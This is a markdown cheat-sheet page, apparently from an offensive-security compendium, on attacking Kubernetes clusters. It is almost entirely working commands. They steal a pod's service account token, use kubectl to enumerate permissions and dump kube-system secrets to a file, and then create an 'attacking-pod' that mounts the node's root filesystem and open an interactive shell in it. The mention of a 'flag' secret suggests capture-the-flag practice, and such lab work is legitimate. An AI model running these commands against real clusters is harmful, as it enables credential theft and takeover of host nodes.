killchain-compendium/misc/level3_hypervisor/kubernetes.md

Kubernetes

• Check kubeletctl as well

Account Token

• Snatch an account token from inside a pod
• Use it via kubectl, watch out for authorizations and namespaces

kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 auth can-i --list
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get namespaces

• Save secrets from namespaces as yaml file

kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get secrets -o yaml -n kube-system > kube-system.yml
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get secrets -n kube-system

• Specify secret

kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get secrets flag -n kube-system -o yaml

Privilege Escalation

• appsecco's blog
• Show images via

kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get pods
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get pod  <image> -o yaml

• Use a found image to create the following yaml file

apiVersion: v1
kind: Pod
metadata:
  name: attacking-pod
spec:
  containers:
  - image: <image name in found containers section> 
    name: <name of image in found containers section>
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    volumeMounts:
    - mountPath: /host
      name: host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory

• / of the node is mounted to /host inside the new pod
• Create the pod via

kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 apply -f <filename.yaml>

• Run an interactive session on the pod

kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bash